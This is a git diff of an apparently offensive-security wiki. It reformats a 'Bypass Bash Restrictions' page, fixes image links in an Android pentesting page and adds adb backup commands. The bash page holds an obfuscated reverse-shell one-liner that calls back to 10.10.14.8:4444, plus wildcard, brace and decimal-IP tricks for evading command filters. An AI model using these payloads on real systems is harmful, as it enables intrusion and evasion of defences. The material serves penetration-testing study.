diff --git a/.gitbook/assets/image (435).png b/.gitbook/assets/image (436) (1).png similarity index 100% rename from .gitbook/assets/image (435).png rename to .gitbook/assets/image (436) (1).png diff --git a/linux-unix/useful-linux-commands/bypass-bash-restrictions.md b/linux-unix/useful-linux-commands/bypass-bash-restrictions.md index 0a63a7a65..7a3e52419 100644 --- a/linux-unix/useful-linux-commands/bypass-bash-restrictions.md +++ b/linux-unix/useful-linux-commands/bypass-bash-restrictions.md @@ -1,13 +1,16 @@ -# WAF Evasion / Bypass Bash Restrictions +# Bypass Bash Restrictions ## Reverse Shell -```sh + +```bash # Double-Base64 is a great way to avoid bad characters like +, works 99% of the time echo "echo $(echo 'bash -i >& /dev/tcp/10.10.14.8/4444 0>&1' | base64 | base64)|ba''se''6''4 -''d|ba''se''64 -''d|b''a''s''h" | sed 's/ /${IFS}/g' #echo${IFS}WW1GemFDQXRhU0ErSmlBdlpHVjJMM1JqY0M4eE1DNHhNQzR4TkM0NEx6UTBORFFnTUQ0bU1Rbz0K|ba''se''6''4${IFS}-''d|ba''se''64${IFS}-''d|b''a''s''h ``` + ## Bypass Paths and forbidden commands -```sh + +```bash # Question mark binary substitution /usr/bin/p?ng # /usr/bin/ping nma? -p 80 localhost # /usr/bin/nmap -p 80 localhost @@ -46,7 +49,8 @@ whoa # This will throw an error ``` ## Bypass forbidden spaces -```sh + +```bash # {form} {cat,lol.txt} # cat lol.txt {echo,test} # echo test @@ -77,16 +81,19 @@ uname!-1\-a # This equals to uname -a ``` ## Bypass IPs -```sh + +```bash # Decimal IPs 127.0.0.1 == 2130706433 ``` ## References & More -{% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection#exploits" %} -{% embed url="https://github.com/Bo0oM/WAF-bypass-Cheat-Sheet" %} +{% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection\#exploits" caption="" %} -{% embed url="https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0" %} +{% embed url="https://github.com/Bo0oM/WAF-bypass-Cheat-Sheet" caption="" %} + +{% embed url="https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0" caption="" %} + +{% embed url="https://www.secjuice.com/web-application-firewall-waf-evasion/" caption="" %} -{% embed url="https://www.secjuice.com/web-application-firewall-waf-evasion/" %} diff --git a/mobile-apps-pentesting/android-app-pentesting/README.md b/mobile-apps-pentesting/android-app-pentesting/README.md index fae6ddd53..7aa976513 100644 --- a/mobile-apps-pentesting/android-app-pentesting/README.md +++ b/mobile-apps-pentesting/android-app-pentesting/README.md @@ -97,7 +97,7 @@ In this case you could try to abuse the functionality creating a web with the fo In order to find the **code that will be executed in the App**, go to the activity called by the deeplink and search the function **`onNewIntent`**. -![](../../.gitbook/assets/image%20%28436%29.png) +![](../../.gitbook/assets/image%20%28436%29%20%281%29.png) Learn how to [call deep links without using HTML pages below](./#exploiting-schemes-deep-links). @@ -455,7 +455,7 @@ _Note that you can **omit the package name** and the mobile will automatically c In order to find the **code that will be executed in the App**, go to the activity called by the deeplink and search the function **`onNewIntent`**. -![](../../.gitbook/assets/image%20%28435%29.png) +![](../../.gitbook/assets/image%20%28436%29.png) #### Sensitive info diff --git a/mobile-apps-pentesting/android-app-pentesting/adb-commands.md b/mobile-apps-pentesting/android-app-pentesting/adb-commands.md index 19a22ef24..a774bd531 100644 --- a/mobile-apps-pentesting/android-app-pentesting/adb-commands.md +++ b/mobile-apps-pentesting/android-app-pentesting/adb-commands.md @@ -348,5 +348,9 @@ adb backup [-apk] [-shared] [-system] [-all] -f file.backup # -shared -- Include removable storage # -system -- Include system Applciations # -all -- Include all the applications + +adb shell pm list packages -f -3 #List packages +adb backup -f myapp.ab -apk com.myapp # backup on one device +adb restore myapp.ab # restore to the same or any other device ```